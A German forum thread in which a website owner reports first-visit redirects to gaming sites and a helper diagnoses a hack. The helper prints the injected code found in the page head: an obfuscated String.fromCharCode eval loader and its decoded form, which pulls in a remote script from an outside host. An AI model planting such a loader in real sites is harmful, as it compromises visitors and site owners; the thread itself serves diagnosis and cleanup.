Seite wird weitergeleitet

  • Guten Morgen Allerseits,

    seit gestern wird meine Seite beim ersten Aufrufen auf irgendwelche Gaming Seiten weitergeleitet. Kann mir jemand sagen, wie ich die Ursache dafür finden könnte?

    Vielen Dank
    Ronnschi

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Vielen Dank für die links. Überall wird die Seite als sicher angezeigt. Es wird nichts gefunden. Die Umleitung passiert auch nur beim ersten Mal. Lädt man die Seite erneut, öffnet sie sich ganz normal.

  • Passiert das auf allen Rechnern, also nicht nur auf deinem PC? Passiert das mit allen Browsern?

    Das Geheimnis des Könnens liegt im Wollen!
    [size=12]Bitte keine Hilfegesuche per PN (auch keine "privaten" Links). Das ist ein öffentliches Forum.[/SIZE]

  • Definitiv gehackt.

    Code
    <head><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 10...


    Ergibt "entschlüsselt" das hier, wobei über [FONT=Courier New]somestring.src[/FONT] dann ein "böses" Script von [FONT=Courier New]h[COLOR=#ff0000][XX][/COLOR]ttps://examhome.n[COLOR=#ff0000][XX][/COLOR]et/stat.js?v=1.0.2[/FONT] eingebunden wird.

    Code
    var somestring = document.createElement('script'); somestring.type = 'text/javascript'; somestring.async = true;somestring.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 115, 116, 97, 116, 46, 106, 115, 63, 118, 61, 49, 46, 48, 46, 50);   var alls = document.getElementsByTagName('script'); var nt3 = true; for ( var i = alls.length; i--;) { if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) { nt3 = false;} } if(nt3 == true){document.getElementsByTagName("head")[0].appendChild(somestring); }

    Komplettbackup im gehackten Zustand erstellen, damit man später nachvollziehen kann, wo die Lücke war. Das weitere Vorgehen ist z.B. hier beschrieben.

    6 Mal editiert, zuletzt von b3317133 (20. September 2018 um 12:11)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!